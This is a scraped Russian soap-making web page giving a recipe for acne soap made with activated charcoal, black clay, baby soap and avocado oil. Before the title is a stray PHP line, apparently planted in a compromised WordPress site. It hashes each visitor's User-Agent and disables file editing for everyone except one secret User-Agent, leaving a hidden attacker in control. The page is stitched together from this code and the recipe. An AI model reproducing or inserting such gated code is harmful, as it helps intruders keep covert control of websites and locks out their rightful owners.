if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Рецепт мыла своими руками для борьбы с угрями | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Рецепт мыла своими руками для борьбы с угрями

Приготовить мыло в домашних условиях, да еще и такое, которое будет активно бороться с проблемами кожи – это целая история. Например, мыло с глиной и активированным углем очень помогает в борьбе с угрями.

При­го­то­вить мыло в домаш­них усло­ви­ях, да еще и такое, кото­рое будет актив­но бороть­ся с про­бле­ма­ми кожи – это целая исто­рия. Напри­мер, мыло, где исполь­зу­ет­ся гли­на и акти­ви­ро­ван­ный уголь, эффек­тив­но помо­га­ет в борь­бе с угрями.

Что­бы сде­лать такое мыло, нуж­но для нача­ла рас­те­реть в кофе­мол­ке 2 упа­ков­ки акти­ви­ро­ван­но­го угля. Затем на мел­кой тер­ке нати­ра­ем 4 бру­соч­ка любо­го дет­ско­го мыла и пла­вим его. В рас­плав­лен­ное мыло капа­ем мас­ло аво­ка­до, вита­мин Е и пару капель любой отдуш­ки по вку­су. В смесь добав­ля­ем рас­тер­тый уголь и кос­ме­ти­че­скую чер­ную гли­ну. Пере­ме­ши­ва­ем все ингре­ди­ен­ты, зали­ва­ем в фор­мы и остав­ля­ем застывать.

глина2

глина3


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Юлия Евланова

Уже давно увлекаюсь мыловарением. Вот нашла интересный сайт, где можно показать свои творения! Читайте все мои записи!